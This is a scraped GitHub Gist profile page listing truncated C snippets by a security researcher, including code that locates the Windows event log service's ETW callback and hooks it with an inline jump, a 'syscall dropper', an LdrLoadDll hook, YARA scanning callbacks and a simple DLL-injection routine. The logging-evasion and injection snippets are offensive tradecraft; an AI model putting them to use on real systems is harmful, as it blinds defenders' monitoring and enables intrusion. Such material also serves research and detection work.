Skip to content

Instantly share code, notes, and snippets.

View bats3c's full-sized avatar

batsec bats3c

1.2k followers · 1 following
View GitHub Profile
@bats3c
bats3c / fake_image_loads.c
Created June 14, 2021 13:37
#include <stdio.h>
#include <windows.h>
#include <winternl.h>
#define DLL_TO_FAKE_LOAD L"\\??\\C:\\windows\\system32\\calc.exe"
BOOL FakeImageLoad()
{
HANDLE hFile;
SIZE_T stSize = 0;
@bats3c
bats3c / yara_scan_mem.c
Created September 4, 2020 16:22
Yara Scan Memory
INT ToReportOrNotToReportThatIsTheQuestion( YR_SCAN_CONTEXT* Context,
INT Message,
PVOID pMessageData,
PVOID pUserData
)
{
if (Message == CALLBACK_MSG_RULE_MATCHING)
{
(*(int*)pUserData) = 1;
}
@bats3c
bats3c / yara_setup_rules.c
Created September 4, 2020 16:15
Basic Yara Usage
#define RULE_ALLOW_ALL "rule Allow { condition: false }"
YRInitalize();
RtlCopyMemory(cRule, RULE_ALLOW_ALL, strlen(RULE_ALLOW_ALL));
if (YRCompilerCreate(&yrCompiler) != ERROR_SUCCESS)
{
return -1;
}
@bats3c
bats3c / restore_callback.c
Created September 4, 2020 15:32
Restore the callback so we can report an event, then rehook it
typedef VOID(WINAPI * EtwEventCallback_) (EVENT_RECORD *EventRecord);
VOID DoOriginalEtwCallback( EVENT_RECORD *EventRecord )
{
DWORD dwOldProtect;
VirtualProtect(lpCallbackOffset, sizeof(OriginalBytes), PAGE_EXECUTE_READWRITE, &dwOldProtect);
memcpy(lpCallbackOffset, OriginalBytes, sizeof(OriginalBytes));
VirtualProtect(lpCallbackOffset, sizeof(OriginalBytes), dwOldProtect, &dwOldProtect);
@bats3c
bats3c / hook_etw_callback.c
Created September 4, 2020 15:12
Hook The ETW Callback
VOID HookEtwCallback()
{
DWORD oldProtect, oldOldProtect;
unsigned char boing[] = { 0x49, 0xbb, 0xde, 0xad, 0xc0, 0xde, 0xde, 0xad, 0xc0, 0xde, 0x41, 0xff, 0xe3 };
*(void **)(boing + 2) = &EtwCallbackHook;
VirtualProtect(lpCallbackOffset, 13, PAGE_EXECUTE_READWRITE, &oldProtect);
memcpy(lpCallbackOffset, boing, sizeof(boing));
@bats3c
bats3c / pattern_search_etwcallback.c
Last active September 4, 2020 14:42
Pattern search for the ETW callback
#define PATTERN "\x48\x83\xec\x38\x4c\x8b\x0d"
DWORD i;
LPVOID lpCallbackOffset;
for (i = 0; i < 0xfffff; i++)
{
if (!memcmp((PVOID)(dwBase + i), (unsigned char*)PATTERN, strlen(PATTERN)))
{
lpCallbackOffset = (LPVOID)(dwBase + i);
@bats3c
bats3c / locate_wevtsvc_base_address.c
Last active September 4, 2020 14:32
Locate the base address of wevtsvc.dll
DWORD_PTR dwBase;
DWORD i, dwSizeNeeded;
HMODULE hModules[102400];
TCHAR szModule[MAX_PATH];
if (EnumProcessModules(GetCurrentProcess(), hModules, sizeof(hModules), &dwSizeNeeded))
{
for (int i = 0; i < (dwSizeNeeded / sizeof(HMODULE)); i++)
{
ZeroMemory((PVOID)szModule, MAX_PATH);
@bats3c
bats3c / syscall_dropper.c
Created August 11, 2020 16:59
#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>
#include <tlhelp32.h>
#include <ntdef.h>
#include <winternl.h>
#include "main.h"
/****************************************************************************************************/
@bats3c
bats3c / ldrloaddll_hook.c
Last active January 11, 2025 07:19
Hook LdrLoadDll to whitelist DLLs being loaded into a process
#include <stdio.h>
#include <windows.h>
#include <winternl.h>
#define dwAllowDllCount 1
CHAR cAllowDlls[dwAllowDllCount][MAX_PATH] = {
"W:\\allowed.dll"
};
VOID HookLoadDll(LPVOID lpAddr);
@bats3c
bats3c / simple_dll_injection.c
Created August 7, 2020 01:04
VOID InjectDll(DWORD dwPid, LPCVOID lpDllPath)
{
LPVOID lpBuffer;
HANDLE hProcess, hThread;
hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, dwPid);
if (!hProcess)
{
return;
}